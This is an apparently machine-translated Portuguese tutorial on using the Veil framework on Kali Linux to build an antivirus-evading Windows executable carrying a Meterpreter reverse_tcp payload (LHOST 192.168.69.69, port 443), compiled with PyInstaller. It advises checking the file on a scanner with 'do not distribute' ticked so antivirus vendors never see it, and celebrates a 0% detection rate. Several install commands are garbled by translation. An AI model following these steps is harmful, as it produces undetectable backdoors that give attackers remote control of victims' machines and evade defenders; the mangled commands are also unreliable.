Veil é uma ótima ferramenta desenvolvida por Chris Truncer @ChrisTruncer, Mike Wright @ TheMightyShiv e The Grayhound @the_grayhound especificamente projetado para o Kali Linux
Eu quero falar sobre Veil e dar alguns exemplos sobre como ignorar vários anti-vírus.
As principais mudanças nas versões mais recentes são:
- Compatibilidade x64 - Atualizaram o script de configuração para tornar o Veil compatível com as versões x86 e x64.
- Atualização - Now Veil possui uma função de atualização. Agora, podemos atualizar o Veil na linha de comando ou no menu.
Se você quiser instalar o Veil em qualquer ambiente que você preferir, você pode usar os seguintes comandos:
Wget https://github.com/ChrisTruncer/Veil/archive/master.zipDescompacte master.zipCd Veil-master / setupCd .../setup.sh
Se você quer trabalhar com o Kali Linux , com os comandos abaixo será suficiente.
Atualização apt-getVéu de instalação apropriado
Eu tive uma experiência ruim com a segunda opção e prefiro instalar o Veil com o primeiro usando o script "setup.sh".
Os desenvolvedores do Veil não querem enviar qualquer carga útil para www.virustotal.com para evitar a distribuição aos fornecedores de antivírus . Existe uma alternativa: vscan.novirusthanks.org . Esse site verifica os arquivos suspeitos para a detecção de malware e nos oferece a opção: "Não distribua a amostra".
Quando o Veil foi instalado, basta executá-lo com o comando abaixo:
./VéuPor padrão no Kali Linux, podemos ver 18 cargas úteis prontas para serem usadas. Agora podemos digitar "usar".Aqui, o Veil nos oferece mais informações sobre as cargas úteis. Nesse caso, escolho python / b64VirtualAlloc digitando " 18 "Quando nossa carga útil é carregada, digite " gerar ". Você pode definir algumas opções específicas, mas nesta publicação, vamos tentar as opções padrão.Agora vamos selecionar msfvenom digitando " 1 "
Depois disso, precisamos digitar alguns detalhes:
- Digite a carga útil de metasploit: " windows / meterpreter / reverse_tcp "
- Digite o valor para 'LHOST', [ guia ] para IP local: "192.168.69.69"
- Digite o valor para 'LPORT': " 443 "
Então, é necessário esperar enquanto o shellcode foi gerado.
Você precisa pressionar enter e, em seguida, Veil solicita o nome da nossa carga útil. Nesse caso, " indetectável " (ou o que quiser)
Nós vamos usar Pyinstaller. Ele criará um .exe instalável. Para isso, vamos digitar " 1 "
No final, podemos obter o nosso executável em " / root / Veil-master / output / compiled / "
Agora, temos o nosso executável e vamos enviá-lo para vscan.novirusthanks.org . Por favor, lembre- se de verificar " Não distribuir a amostra ". Se você optar por não verificar essas opções ou decidir enviar o executável para www.virustotal.com, seu arquivo será investigado e talvez seja reconhecido por alguns fornecedores de antivírus.
Você pode ver na imagem abaixo qualquer um dos fornecedores de antivírus que detectaram nosso arquivo como malicioso. Temos uma taxa de detecção de 0% !!!!
